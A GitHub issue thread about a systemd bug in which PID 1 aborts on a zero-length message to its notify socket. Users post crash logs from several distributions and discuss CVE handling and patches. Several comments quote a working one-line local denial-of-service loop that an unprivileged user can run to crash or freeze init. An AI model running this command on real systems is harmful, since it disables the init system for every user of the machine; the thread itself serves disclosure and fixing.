Assertion failure when PID 1 receives a zero-length message over notify socket #4234
Nothing seems to break when I do the same on systemd v229.
I do get "systemd[1]: Cannot find unit for notify message of PID 8688" in the logs.
Is your PoC correct?
Okay, I managed to trigger this on v229 by changing the PoC to the following:
while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
While it threw the "Cannot find unit" messages for a bit, in less than 30 seconds that changed to:
systemd[1]: Assertion 'n > 0' failed at ../src/core/manager.c:1501, function manager_invoke_notify_message(). Aborting.
systemd[1]: Caught <ABRT>, dumped core as pid 10335.
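For context on why an empty argument can reach the assertion at all: on Linux, an AF_UNIX datagram socket accepts a zero-length datagram, and the receiver sees it as a successful read of length 0 rather than as an error or end-of-file. The following is a minimal sketch of that behaviour using a socketpair() instead of the real notify socket; the function name recv_len_of_empty_datagram is made up for illustration and is not part of systemd.

```c
#include <assert.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper (not systemd code): sends one empty datagram across a
 * connected AF_UNIX/SOCK_DGRAM pair and returns what recv() reports on the
 * other end, or -1 if the setup or the send fails. */
ssize_t recv_len_of_empty_datagram(void) {
    int fds[2];
    char buf[64];
    ssize_t n;

    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, fds) < 0)
        return -1;

    /* A zero-byte payload is still a complete datagram. */
    if (send(fds[0], "", 0, 0) < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    /* The datagram is already queued, so this does not block. */
    n = recv(fds[1], buf, sizeof(buf), 0);

    close(fds[0]);
    close(fds[1]);
    return n;
}
```

A receiver that asserts n > 0 after a successful read would therefore abort on such a datagram.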
Ubuntu 16.04 (systemd v229), with the while-loop PoC:
Sep 28 22:21:36 odyssey systemd[1]: Cannot find unit for notify message of PID 21076.
Sep 28 22:21:36 odyssey systemd[1]: Cannot find unit for notify message of PID 21077.
Sep 28 22:21:36 odyssey systemd[1]: Assertion 'n > 0' failed at ../src/core/manager.c:1501, function manager_invoke_notify_message(). Aborting.
Sep 28 22:21:37 odyssey systemd[1]: Caught <ABRT>, dumped core as pid 21079.
Sep 28 22:21:37 odyssey systemd[1]: Freezing execution.
(However, no adverse effect on the running system)
On Ubuntu 16.04.1 with systemd 229-4ubuntu8 installed, as a non-root user:
$ NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
$ sudo systemctl list-units -t service
Failed to list units: Connection timed out
On Arch Linux with systemd 231 (with the while-loop PoC):
Sep 29 00:06:07 arch-64-glaukon systemd[1]: Assertion 'n > 0' failed at src/core/manager.c:1593, function manager_invoke_notify_message(). Aborting.
Sep 29 00:06:07 arch-64-glaukon systemd-coredump[9495]: Due to PID 1 having crashed coredump collection will now be turned off.
Sep 29 00:06:07 arch-64-glaukon systemd[1]: Caught <ABRT>, dumped core as pid 9494.
Sep 29 00:06:07 arch-64-glaukon systemd[1]: Freezing execution.
Sep 29 00:06:08 arch-64-glaukon systemd-coredump[9495]: Detected coredump of the journal daemon or PID 1, diverted to /var/lib/systemd/coredump/core.systemd.0.f9b64f9e7c164d80a53
user root by (uid=1000)
This seems to be a denial-of-service issue that crosses the user boundary, which makes it a security vulnerability. Please consider handling it as such.
It is unfortunate that this was not handled using a 'responsible disclosure' process. A CVE was requested post publication, though: http://www.openwall.com/lists/oss-security/2016/09/28/9
It triggers the bug for me. The log says:
Sep 28 18:49:11 Vortex systemd-coredump[2216]: Due to PID 1 having crashed coredump collection will now be turned off.
Sep 28 18:49:11 Vortex systemd[1]: Caught <ABRT>, dumped core as pid 2215.
Sep 28 18:49:11 Vortex systemd[1]: Freezing execution.
Sep 28 18:49:11 Vortex systemd-coredump[2216]: Detected coredump of the journal daemon or PID 1, diverted to /var/lib/systemd/coredump/core.systemd.0.26728e5633c9450facfa4e5f6d9f3807.2215.1475106551000000.lz4.
This one-line patch, which changes assert(n > 0) to assert(n >= 0), stops my system from hitting this bug. Hopefully somebody more knowledgeable about systemd will know whether more needs to be done to fix this issue properly.
assert.patch.txt
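As an alternative to relaxing the assertion, the empty message could be filtered out before the handler is called, so that the handler keeps its strict n > 0 precondition. The following is only a sketch of that idea under stated assumptions: the names dispatch_notify, invoke_notify_message and enum notify_result are hypothetical stand-ins and do not reproduce the code in src/core/manager.c.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/types.h>

/* Hypothetical result codes, for illustration only. */
enum notify_result { NOTIFY_HANDLED, NOTIFY_IGNORED, NOTIFY_FAILED };

/* Hypothetical stand-in for the real handler: it keeps the strict
 * precondition that the issue's assertion expresses. */
void invoke_notify_message(const char *buf, size_t n) {
    assert(buf);
    assert(n > 0);
    /* Parsing of "KEY=value" lines would happen here. */
}

/* Hypothetical call site: n is the return value of the receive call. */
enum notify_result dispatch_notify(const char *buf, ssize_t n) {
    if (n < 0)
        return NOTIFY_FAILED;   /* receive error */
    if (n == 0)
        return NOTIFY_IGNORED;  /* empty datagram: nothing to parse */

    invoke_notify_message(buf, (size_t) n);
    return NOTIFY_HANDLED;
}
```

With this shape, dispatch_notify("", 0) returns NOTIFY_IGNORED instead of aborting, while a non-empty payload such as "READY=1" still reaches the handler.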
Hi,
I tried to reproduce the PoC attack in a Debian Jessie 8.6 VM running 'systemd 215-17+deb8u5' by executing systemd-notify in a "while true" loop. For what it's worth, as far as I can tell no complete crash occurred.
systemd-journald.service and systemd-logind.service did crash. Nevertheless, I was able to restart sshd via systemctl and accept connections.
The assert mentioned in 5ba6985#diff-ab78220e12703ee63fa1e6a2caa16bebR1325 seems to be present in the installed debian package https://sources.debian.net/src/systemd/215-17%2Bdeb8u5/src/core/manager.c/?hl=1567#L1487
I just ran the following command as a regular user on my Linux Mint 18 (Sarah), and got this:
$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
^C%
$ uname -a
Linux gz-Latitude-E7240 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
I also ran the same command as root and got the same result. I don't see any issues with my system after this. I am unable to replicate the bug.
Possibly this was the real cause of this bug? d875aa8
That's only in v219 which would explain why it doesn't crash on jessie which has v215 (I also couldn't make the POC work there).
Older distros are affected differently, I think: no assertion is triggered, but manager_dispatch_notify_fd() still returns an error, which has the bad side effect of disabling the notification handler completely; see https://github.com/systemd/systemd/blob/v215/src/core/manager.c#L1398.
All services using the watchdog feature will then silently fail to notify PID 1, which will consider those services dead and kill them.
See #4240 for a possible fix.
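The failure mode described for older versions can be modelled in a few lines. This is a toy model, not systemd or sd-event code: struct source, dispatch, strict_handler and tolerant_handler are all hypothetical names, and the only behaviour assumed is the one described above, namely that a handler returning an error gets its event source switched off.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <sys/types.h>

/* Toy event source: a handler plus an enabled flag. */
struct source {
    bool enabled;
    int (*handler)(ssize_t n);
};

/* Treats an empty message as an I/O error (models the older behaviour). */
int strict_handler(ssize_t n) {
    return n <= 0 ? -EIO : 0;
}

/* Treats an empty message as ignorable and reports success. */
int tolerant_handler(ssize_t n) {
    return n < 0 ? -EIO : 0;
}

/* Toy dispatcher: a failing handler disables its source for good. */
void dispatch(struct source *s, ssize_t n) {
    if (!s->enabled)
        return;
    if (s->handler(n) < 0)
        s->enabled = false;
}

/* Feeds one empty message followed by one 7-byte message and reports
 * whether the source is still enabled afterwards. */
bool survives_empty_message(int (*handler)(ssize_t n)) {
    struct source s = { .enabled = true, .handler = handler };

    dispatch(&s, 0);
    dispatch(&s, 7);
    return s.enabled;
}
```

In this model a single empty message permanently silences the strict source, so later watchdog keep-alives from legitimate services would never be seen, which matches the watchdog errors reported for logind and journald.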
@fbuihuu I can confirm that finding. With v215 from Debian, logind and journald fail with watchdog errors. Other than that, the system remained in a usable state. I could start and stop services, reboot in a controlled manner, etc.
Reported the issue to Red Hat just so they were aware, though I'm sure they already are.
Reproduced on Ubuntu 15.10, which has systemd v225, so I'm not quite sure whether v219's change is the issue. Could this be the problem? 5ba6985#diff-ab78220e12703ee63fa1e6a2caa16bebR1325
Will take a look at this further tonight and see if I can help.
Reporting the issue on Fedora 24 Desktop / systemd 229:
[soul@RyujinJakka Sandbox]$ uname -a
Linux RyujinJakka 4.7.4-200.fc24.x86_64 #1 SMP Thu Sep 15 18:42:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[soul@RyujinJakka Sandbox]$ systemctl --version
systemd 229
+PAM +AUDIT +SELINUX +IMA -APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN
[soul@RyujinJakka Sandbox]$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
^C
[soul@RyujinJakka Sandbox]$ sudo systemctl list-units -t service
Failed to list units: Failed to activate service 'org.freedesktop.systemd1': timed out
Calls to systemd-based commands (systemd-nspawn, systemctl, reboot, etc.) hang and later show a timeout message; there is no general system degradation (screenshots: http://wp.me/p7FGzd-49).
The system hangs on reboot and shutdown.
Can reproduce on Debian stretch, with systemd 231-4
> apt-cache policy systemd
systemd:
Installed: 231-4
Candidate: 231-4
Version table:
*** 231-4 500
500 http://ftp.debian.org/debian stretch/main amd64 Packages
100 /var/lib/dpkg/status
230-7~bpo8+2 100
100 http://ftp.debian.org/debian jessie-backports/main amd64 Packages
215-17+deb8u5 500
500 http://ftp.debian.org/debian jessie/main amd64 Packages
root / # env NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
root / #
Broadcast message from systemd-journald@local (Sun 2016-10-02 21:11:49 CEST):
systemd[1]: Caught <ABRT>, dumped core as pid 5439.
Message from syslogd@local at Oct 2 21:11:49 ...
systemd[1]: Caught <ABRT>, dumped core as pid 5439.
Broadcast message from systemd-journald@local (Sun 2016-10-02 21:11:49 CEST):
systemd[1]: Freezing execution.
Message from syslogd@local at Oct 2 21:11:49 ...
systemd[1]: Freezing execution.
From syslog
Oct 2 21:11:49 local systemd[1]: Assertion 'n > 0' failed at ../src/core/manager.c:1593, function manager_invoke_notify_message(). Aborting.
Oct 2 21:11:49 local systemd[1]: Caught <ABRT>, dumped core as pid 5439.
Oct 2 21:11:49 local systemd[1]: Freezing execution.
Later messages are, for example, these:
# systemctl
Failed to list units: Failed to activate service 'org.freedesktop.systemd1': timed out
# systemctl start org.freedesktop.systemd1
Failed to start org.freedesktop.systemd1.service: Failed to activate service 'org.freedesktop.systemd1': timed out
See system logs and 'systemctl status org.freedesktop.systemd1.service' for details.
# systemctl status org.freedesktop.systemd1.service
Failed to get properties: Failed to activate service 'org.freedesktop.systemd1': timed out
@smarek The Debian package was fixed in 231-9. It's currently in unstable and should reach testing in 2-3 days. The version in stable, v215, is not directly affected by this crash.
abaza@abaza-VirtualBox:~$ systemctl --version
systemd 229
+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN
abaza@abaza-VirtualBox:~$ uname -a
Linux abaza-VirtualBox 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
abaza@abaza-VirtualBox:~$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
^C
abaza@abaza-VirtualBox:~$ sudo systemctl list-units -t service
[sudo] password for abaza:
UNIT LOAD ACTIVE SUB JOB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
alsa-restore.service loaded active exited Save/Restore Sound Card State
anacron.service loaded active running Run anacron jobs
apparmor.service loaded active exited LSB: AppArmor initialization
apport.service loaded active exited LSB: automatic crash report generation
apt-daily.service loaded activating start start Daily apt activities
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
colord.service loaded active running Manage, Install and Generate Color Profiles
console-setup.service loaded active exited Set console keymap
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
...............................
There is no effect
systemd fails an assertion in manager_invoke_notify_message when a zero-length message is received over /run/systemd/notify. This allows a local user to perform a denial-of-service attack against PID 1.
Proof-of-concept: